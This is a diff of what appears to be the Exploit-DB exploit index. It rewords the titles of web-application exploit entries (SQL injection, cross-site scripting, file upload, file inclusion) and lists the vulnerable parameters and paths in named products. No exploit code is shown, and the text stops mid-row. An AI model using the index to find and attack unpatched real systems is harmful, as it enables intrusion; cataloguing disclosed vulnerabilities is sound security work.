38050,platforms/php/webapps/38050.txt,"WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",php,webapps,80 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 -38057,platforms/php/webapps/38057.txt,"WordPress Theme Magazine Basic - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38060,platforms/php/webapps/38060.txt,"WordPress Plugin Ads Box - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 -38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' Parameter SQL Injection",2012-11-24,Metropolis,php,webapps,0 -38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 -38063,platforms/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 -38064,platforms/php/webapps/38064.txt,"WordPress Theme CStar Design - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 +38057,platforms/php/webapps/38057.txt,"WordPress Theme Magazine Basic - 'id' SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38060,platforms/php/webapps/38060.txt,"WordPress Plugin Ads Box - 'count' SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 +38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' SQL Injection",2012-11-24,Metropolis,php,webapps,0 +38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 +38063,platforms/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,php,webapps,0 +38064,platforms/php/webapps/38064.txt,"WordPress Theme CStar Design - 'id' SQL Injection",2012-11-27,Amirh03in,php,webapps,0 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Exploit",2015-09-02,"Pier-Luc Maltais",php,webapps,80 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,php,webapps,80 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38086,platforms/php/webapps/38086.html,"WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 -38077,platforms/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 -38078,platforms/php/webapps/38078.py,"Elastix - 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 -38099,platforms/php/webapps/38099.txt,"TinyMCPUK - 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 +38077,platforms/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 +38078,platforms/php/webapps/38078.py,"Elastix - 'page' Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 +38099,platforms/php/webapps/38099.txt,"TinyMCPUK - 'test' Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0 38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - Cross-Site Request Forgery",2015-09-04,"Ken Smith",hardware,webapps,80 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,php,webapps,0 -38101,platforms/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 -38102,platforms/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 -38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 +38101,platforms/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 +38102,platforms/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 +38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,php,webapps,0 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 38105,platforms/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 38111,platforms/php/webapps/38111.txt,"WordPress Plugin Simple Gmail Login - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 -38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 +38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 38113,platforms/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0 @@ -36546,40 +36547,40 @@ id,file,description,date,author,platform,type,port 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0 -38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 -38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext' Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 -38134,platforms/php/webapps/38134.txt,"Joomla! Component com_ztautolink - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38135,platforms/php/webapps/38135.txt,"Joomla! Component com_bit - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 +38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 +38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 +38134,platforms/php/webapps/38134.txt,"Joomla! Component com_ztautolink - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38135,platforms/php/webapps/38135.txt,"Joomla! Component com_bit - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 -38142,platforms/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 -38143,platforms/php/webapps/38143.txt,"cPanel - 'account' Parameter Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 +38142,platforms/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 +38143,platforms/php/webapps/38143.txt,"cPanel - 'account' Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 38144,platforms/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,php,webapps,0 38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80 38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 38152,platforms/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 -38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html acct' Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 -38154,platforms/php/webapps/38154.txt,"cPanel - detailbw.html Multiple Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 -38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 -38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 +38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html?acct' Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 +38154,platforms/php/webapps/38154.txt,"cPanel - 'detailbw.html' Multiple Cross-Site Scripting Vulnerabilities",2012-12-27,"Christy Philip Mathew",php,webapps,0 +38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 +38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 38157,platforms/php/webapps/38157.txt,"WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 -38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID' Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 -38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 +38158,platforms/php/webapps/38158.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php? reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38159,platforms/php/webapps/38159.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38160,platforms/php/webapps/38160.txt,"WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID' SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38161,platforms/php/webapps/38161.txt,"osTicket - 'l.php?url' Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 +38162,platforms/php/webapps/38162.txt,"osTicket - 'tickets.php?status' Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 38163,platforms/php/webapps/38163.txt,"WordPress Plugin Uploader - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 38167,platforms/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 -38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 +38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38171,platforms/php/webapps/38171.txt,"Joomla! Component com_incapsula - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 -38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 +38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 -38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 +38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38183,platforms/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps,0 38184,platforms/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps,0 38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 @@ -36590,36 +36591,36 @@ id,file,description,date,author,platform,type,port 38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - Cross-Site Request Forgery",2015-09-15,hyp3rlinx,jsp,webapps,80 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 38207,platforms/php/webapps/38207.txt,"Quick.CMS / Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 -38209,platforms/php/webapps/38209.txt,"WordPress Plugin Gallery - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 +38209,platforms/php/webapps/38209.txt,"WordPress Plugin Gallery - 'filename_1' Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery / Content Upload / PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted Arbitrary File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 38213,platforms/php/webapps/38213.txt,"FAROL - SQL Injection",2015-09-16,"Thierry Fernandes Faria",php,webapps,80 38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - Cross-Site Request Forgery",2015-09-17,"Curesec Research Team",php,webapps,80 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 -38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 -38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 +38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 +38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,php,webapps,0 38234,platforms/php/webapps/38234.txt,"DigiLIBE - Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 -38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 +38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections",2013-01-25,AkaStep,php,webapps,0 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 -38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 -38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 +38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 +38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38261,platforms/xml/webapps/38261.txt,"SAP NetWeaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0 38290,platforms/php/webapps/38290.txt,"WordPress Theme flashnews - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Parameter Cross-Site Scripting",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38296,platforms/php/webapps/38296.txt,"WordPress Plugin CommentLuv - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 +38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-06,L0n3ly-H34rT,php,webapps,0 +38296,platforms/php/webapps/38296.txt,"WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Plugin Wysija Newsletters - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 -38300,platforms/php/webapps/38300.txt,"WordPress Plugin Audio Player - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 -38301,platforms/php/webapps/38301.txt,"WordPress Theme Pinboard - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 +38300,platforms/php/webapps/38300.txt,"WordPress Plugin Audio Player - 'playerID' Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 +38301,platforms/php/webapps/38301.txt,"WordPress Theme Pinboard - 'tab' Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 @@ -36628,15 +36629,15 @@ id,file,description,date,author,platform,type,port 38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0 38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 -38320,platforms/php/webapps/38320.txt,"Squirrelcart - 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 +38320,platforms/php/webapps/38320.txt,"Squirrelcart - 'table' Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,php,webapps,80 38322,platforms/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 38324,platforms/php/webapps/38324.txt,"WordPress Plugin Pretty Link - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 38326,platforms/php/webapps/38326.txt,"ZenPhoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 -38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 -38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 +38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 +38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 38331,platforms/php/webapps/38331.txt,"WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 @@ -36650,9 +36651,9 @@ id,file,description,date,author,platform,type,port 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 -38355,platforms/php/webapps/38355.txt,"WordPress Plugin Uploader - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 +38355,platforms/php/webapps/38355.txt,"WordPress Plugin Uploader - 'blog' Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 -38359,platforms/php/webapps/38359.txt,"WordPress Plugin Count Per Day - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 +38359,platforms/php/webapps/38359.txt,"WordPress Plugin Count Per Day - 'daytoshow' Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38363,platforms/php/webapps/38363.txt,"File Manager - HTML Injection / Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 38366,platforms/multiple/webapps/38366.py,"Verax NMS - Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",php,webapps,0 @@ -36660,8 +36661,8 @@ id,file,description,date,author,platform,type,port 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 38373,platforms/php/webapps/38373.txt,"WordPress Plugin Terillion Reviews - Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 -38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 -38376,platforms/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 +38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 +38376,platforms/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,windows,webapps,0 @@ -36675,34 +36676,34 @@ id,file,description,date,author,platform,type,port 38400,platforms/php/webapps/38400.txt,"Alienvault Open Source SIEM (OSSIM) 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 -38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 +38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config 